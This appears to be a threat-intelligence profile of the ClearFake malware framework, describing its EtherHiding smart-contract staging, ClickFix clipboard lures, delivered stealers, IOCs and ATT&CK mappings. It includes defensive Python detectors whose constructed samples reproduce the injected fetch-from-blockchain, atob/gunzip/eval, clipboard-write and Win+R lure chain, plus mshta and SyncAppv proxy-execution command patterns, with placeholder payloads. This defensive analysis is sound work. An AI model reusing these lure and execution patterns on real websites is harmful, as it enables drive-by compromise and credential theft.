ClearFake
ClearFake is a malicious JavaScript framework and malware campaign active since July 2023 that is deployed on compromised legitimate websites, frequently WordPress sites, to deliver follow-on malware via drive-by and ClickFix-style social engineering. Early ClearFake activity displayed fake browser update prompts, including fake Chrome update pages, and later evolved into fake browser error dialogs, fake Google reCAPTCHA prompts, and fake Cloudflare Turnstile or verification pages. In current variants, the injected website script silently stages a malicious command in the victim’s clipboard and instructs the user to press Win+R, paste, and execute it, causing self-compromise on Windows systems. ClearFake has also delivered macOS-specific payloads based on browser OS detection.
A defining characteristic of ClearFake is its use of EtherHiding: malicious JavaScript, routing logic, and related configuration are stored in smart contracts on the Binance Smart Chain, including BSC testnet, and retrieved through public RPC endpoints. Multiple reports describe ClearFake fetching Base64-encoded, gzip-compressed, or otherwise obfuscated JavaScript from blockchain-hosted content, decoding it, and executing it with eval(). Researchers also observed anti-analysis logic in on-chain stages, use of multiple smart contracts for Windows and macOS payload delivery, and a separate smart contract used as a public UUID tracker to avoid reinfecting victims and to record compromises. Reported blockchain-related indicators include wallet addresses 0xd71f4cdC84420d2bd07F507b7A4F998b4c2d52c9, 0x9179dda8B285040Bf381AABb8a1f4a1b8c37Ed53, 0x53fd54f55C93f9BCCA471cD0CcbaBC3Acbd3E4AA, and 0x8FBA1667BEF5EdA433928b220886A830488549BD; smart contract addresses 0xA1decFB75C8C0CA28C10517ce56B710baf727d2e, 0x46790e2Ac7F3CA5a7D1bfCe312d11E91d23383Ff, and 0xf4a32588b50a59a82fbA148d436081A48d80832A; and RPC endpoints such as bsc-testnet-rpc.publicnode[.]com, bsc-testnet.drpc.org, and data-seed-prebsc-1-s1.bnbchain[.]org:8545.
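As an added example (not code from the write-up or from Mallory), a small Python scanner that scores a fetched page body for the co-occurring EtherHiding and ClickFix markers described above: the BSC testnet RPC hosts listed here, a JSON-RPC eth_call, the atob/pako-gunzip/eval chain, a clipboard write, and Win+R lure text. The rule weights, the threshold, and the headless-browser and clipboard patterns are assumptions, and both sample pages are constructed.

```python
import re

# Public BSC testnet RPC hosts reported in ClearFake EtherHiding chains (from the write-up).
BSC_TESTNET_RPC_HOSTS = (
    "bsc-testnet-rpc.publicnode.com",
    "bsc-testnet.drpc.org",
    "data-seed-prebsc-1-s1.bnbchain.org",
)

# (name, weight, [patterns that must all match]). Weights and the non-RPC patterns
# are illustrative assumptions; tune them against your own benign corpus first.
RULES = [
    ("bsc_testnet_rpc", 3, [re.compile("|".join(map(re.escape, BSC_TESTNET_RPC_HOSTS)))]),
    ("eth_call_rpc", 2, [re.compile(r'"method"\s*:\s*"eth_call"')]),
    # co-occurrence of atob, a pako gunzip/inflate call and eval, as in the on-chain stages
    ("b64_gunzip_eval", 3, [re.compile(r"\batob\s*\("),
                            re.compile(r"pako\.(?:ungzip|inflate)|gunzip"),
                            re.compile(r"\beval\s*\(")]),
    ("clipboard_write", 2, [re.compile(
        r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)")]),
    ("win_r_lure", 2, [re.compile(r"\bWin(?:dows)?\s*\+\s*R\b", re.I)]),
    ("headless_check", 1, [re.compile(r"navigator\.webdriver|HeadlessChrome")]),
]


def scan_html(html: str, threshold: int = 5) -> dict:
    """Score a page body against RULES; a single weak hit alone never flags a page."""
    hits = [(name, weight) for name, weight, rxs in RULES if all(rx.search(html) for rx in rxs)]
    score = sum(weight for _, weight in hits)
    return {"score": score, "hits": [name for name, _ in hits], "suspicious": score >= threshold}


# Constructed benign page: a legitimate "copy link" button plus an ordinary API call.
BENIGN_PAGE = """<button onclick="navigator.clipboard.writeText(location.href)">Copy link</button>
<script>fetch('/api/articles').then(r => r.json()).then(render);</script>"""

# Constructed page mimicking the injected chain; the contract and command are placeholders.
INJECTED_PAGE = """<script>
if (navigator.webdriver) throw 0;
const body = {"jsonrpc":"2.0","id":1,"method":"eth_call",
  "params":[{"to":"0xCONTRACT_PLACEHOLDER","data":"0x"},"latest"]};
fetch("https://bsc-testnet-rpc.publicnode.com/", {method:"POST", body: JSON.stringify(body)})
  .then(r => r.json()).then(j => { eval(pako.ungzip(atob(j.result), {to: "string"})); });
document.getElementById("verify").onclick = () => {
  navigator.clipboard.writeText("PLACEHOLDER_COMMAND");
  alert("Press Win + R, paste, and press Enter to verify you are human.");
};
</script>"""
```

Run `scan_html` over stored copies of site pages (or over responses captured by a crawler) rather than live in a browser, so the page's own script never executes during the check.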
ClearFake has been associated with delivery of numerous malware families over time. Reported payloads include Amadey, IDAT Loader, Hijack Loader, SectopRAT, ACRStealer, Lumma Stealer, Stealc, Vidar Stealer, and AMOS Stealer for macOS. In one analyzed 2025 chain, malicious PowerShell launched mshta.exe against remote scripts masquerading as media files, leading to Emmenhtal Loader v2 and ultimately Lumma Stealer. Trend Micro reported a later chain delivering SectopRAT, a .NET RAT, and ACRStealer, a C++ infostealer that steals passwords, cookies, credit card data, and cryptocurrency wallet information. Recent reporting also describes ClearFake shifting from mshta.exe to proxy execution via the legitimate Windows script C:\Windows\System32\SyncAppvPublishingServer.vbs to launch hidden PowerShell, and using jsDelivr to host later-stage payloads.
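A defender-side triage of the two proxy-execution steps named above (mshta.exe launched against a remote URL masquerading as a media file, and SyncAppvPublishingServer.vbs carrying an injected PowerShell statement), written here as an added example that is not part of the original reporting. It assumes Sysmon-style JSON process-creation events; the media-extension list, the argument keywords, and the sample events are constructed assumptions.

```python
import json
import re

# Patterns for the two proxy-execution steps. The media-extension list and the
# SyncAppv argument keywords are assumptions for illustration, not vendor rules.
MSHTA_REMOTE = re.compile(r"\bmshta(?:\.exe)?\b.*?\bhttps?://", re.I | re.S)
MEDIA_MASK = re.compile(r"https?://\S+\.(?:mp4|mp3|m4a|wav|avi|jpg|jpeg|png|gif)\b", re.I)
# SyncAppvPublishingServer.vbs hands its argument to PowerShell; a legitimate
# invocation carries no embedded statements, so a ';' or an execute/download verb is the tell.
SYNCAPPV_ABUSE = re.compile(
    r"SyncAppvPublishingServer\.vbs.*?(?:;|Start-Process|IEX|Invoke-|https?://|powershell)",
    re.I | re.S)


def classify_event(event: dict) -> list:
    """Return the names of the ClearFake proxy-execution patterns an event matches."""
    findings = []
    cmd = event.get("CommandLine", "")
    if event.get("Image", "").lower().endswith("mshta.exe") and MSHTA_REMOTE.search(cmd):
        findings.append("mshta_remote_url")
        if MEDIA_MASK.search(cmd):
            findings.append("mshta_media_extension_mask")
    if SYNCAPPV_ABUSE.search(cmd):
        findings.append("syncappv_proxy_exec")
    return findings


def triage(log_text: str) -> list:
    """Parse one JSON event per line and keep only the events that produced findings."""
    results = []
    for line in log_text.strip().splitlines():
        event = json.loads(line)
        findings = classify_event(event)
        if findings:
            results.append((event["Image"], findings))
    return results


# Constructed Sysmon-style process-creation events; remote hosts use .invalid placeholders.
SAMPLE_EVENTS = r"""
{"Image":"C:\\Windows\\System32\\mshta.exe","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"mshta https://staging.invalid/media/intro.mp4"}
{"Image":"C:\\Windows\\System32\\wscript.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"wscript C:\\Windows\\System32\\SyncAppvPublishingServer.vbs n;PLACEHOLDER_HIDDEN_POWERSHELL_STATEMENT"}
{"Image":"C:\\Windows\\System32\\mshta.exe","ParentImage":"C:\\Windows\\explorer.exe","CommandLine":"mshta C:\\Program Files\\Vendor\\admin.hta"}
{"Image":"C:\\Windows\\System32\\wscript.exe","ParentImage":"C:\\Windows\\System32\\svchost.exe","CommandLine":"wscript C:\\Windows\\System32\\SyncAppvPublishingServer.vbs"}
"""
```

The third and fourth events are deliberate negatives: a local .hta and the scheduled-task style invocation of the VBS with no argument produce no findings.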
Infrastructure and scale reporting indicates a broad and resilient operation. Researchers reported over 9,300 potentially compromised websites tied to one ClearFake wallet string as of February 2025; prior telemetry suggested roughly 200,000 unique users were potentially exposed in July 2024; and public smart-contract UUID tracking suggests close to 150,000 likely infections since August 2025. Additional infrastructure linked to ClearFake includes fake verification and payload-delivery domains under .in.net, Cloudflare-backed delivery clusters, and shared hosting or IOC associations with other malware families. Sample-level indicators directly associated with ClearFake include the malicious HTML file f5DRapmtAHwa9nHy.html with SHA256 100cff1fb7d791f474d4c1d95428f8ecb2e8961824d7817b473920551da37ae5. Other reported indicators in ClearFake chains include put34b.camp, libvlccore.dll, pythonw.exe, helper.py, cdn.jsdelivr[.]net/gh/clock-cheking/expert-barnacle/load, and historical domains such as akademipraktik.com, stats-best.site, and multiple Keitaro- and Cloudflare Workers-hosted staging URLs.
ClearFake is consistently described as a ClickFix-style framework operated by threat actors and as a major user of EtherHiding within that ecosystem. It primarily targets website visitors through compromised web infrastructure rather than direct exploitation, relying on fake updates, fake CAPTCHA or verification prompts, clipboard hijacking, and trusted services such as blockchain RPC endpoints and CDNs to evade takedown and traditional URL or IP blocking.
Groups observed using it
2 distinct threat actors attributed by public researchers.
These fake browser update pop-ups were generated through a malicious JavaScript framework that ProofPoint researchers previously dubbed CLEARFAKE.
“VexTrio Viper runs the largest and oldest known TDS with over 165 affiliates including SocGholish and ClearFake.”
Techniques & procedures
18 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
2 techniques
MITRE ATT&CK Mapping ... Resource Development Acquire Infrastructure: Domains T1583.001 joscramp[.]top + 7 co-hosted domains via Dynadot
MITRE ATT&CK Mapping ... Resource Development Acquire Infrastructure: Server T1583.004 Google Cloud VM with custom DNS/mail infrastructure
Initial Access
2 techniques
"This prompt falsely presents itself as a browser update... Once the user interacts with the 'Update Chrome' button, the browser is redirected to another URL where a binary automatically downloads"
The campaign leverages multiple delivery and social engineering mechanisms, including fake BSOD screens, reCAPTCHA prompts, and Cloudflare CAPTCHA challenge pages. All these ClickFix lures ultimately lead to OS-specific payload deployment.
Execution
2 techniques
The initial JavaScript evaluates the code using the following function: eval(`(async(orchid)=>{${ds}})(orchid);`)... await eval(`(async () => { ${haiku} })()`);
"After the user double clicks the fake update binary, it will proceed to download the next stage payload."
Stealth
6 techniques
On the infected website, the backdoor injects malicious inline scripts that leverage both XOR and Base64 obfuscation to evade detection.
the returned values of the functions of the ABI are strings that are compressed with the gzip algorithm and base64 encoded... atob to decode the base64, then pako.gunzip to decompress... Download the AES key from the contract... decrypt it with the AES-GCM algorithm.
"ChromeSetup.exe downloads and executes the Microsoft Software Installer (MSI) package..." and "switches intended to avoid detection: /qn /quiet /norestart"
This stage performs several environment checks, such as inspecting for headless browser frameworks and evaluating the system’s user-agent string. If automated browsing behavior is detected, the execution chain terminates.
Discovery
4 techniques
Fingerprint the victim using the User-Agent: The operating system; The web browser.
This stage performs several environment checks, such as inspecting for headless browser frameworks and evaluating the system’s user-agent string. If automated browsing behavior is detected, the execution chain terminates.
Collection
1 technique
deceiving users into copying and executing a given malicious PowerShell code... The command is copied into the user’s clipboard data.
Command and Control
4 techniques
MITRE ATT&CK™ Matrix - Windows ... Command and Control Standard Application Layer Protocol
Threat actors store data (for example C2 configuration) or code on a public blockchain... they can access it through a legitimate API endpoint... SharkStealer and ArechClient2... pull their C2 configuration from a smart contract... ZigCryptoStealer... uses smart contracts to receive their C2 configuration.
ClearFake fetches and executes base64 encoded and gzip compressed code... The initial smart contract delivers an obfuscated JavaScript payload... dynamically retrieves platform specific second-stage payloads... Java Stealer... continuously monitors the clipboard and further downloads additional payloads.
ErrTraffic initially calls the getUrlFromContract() function to retrieve the command-and-control (C2) panel domain from a blockchain smart contract. Instead of hardcoding the server address directly in the script, the malware queries multiple Polygon RPC endpoints
IOCs tracked for this family
222 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
28 sources tracked across advisories, community write-ups, and news.
A web-based malware delivery framework that compromises legitimate websites and uses BNB Smart Chain testnet smart contracts to host and retrieve malicious JavaScript, enabling resilient payload delivery and anti-takedown command routing. It uses fake CAPTCHA/ClickFix lures and OS-aware staging to deliver follow-on malware to Windows and macOS victims.
A malware family using EtherHiding to fetch additional JavaScript payloads; it retrieves and executes base64-encoded, gzip-compressed code from smart contracts.
A ClickFix-style JavaScript framework that embeds malicious inline scripts into compromised websites, uses multiple smart contracts and blockchain RPC endpoints for staged delivery, performs environment checks, and serves OS-specific ClickFix prompts and payloads.
Loader malware family listed as operating from the same subnet.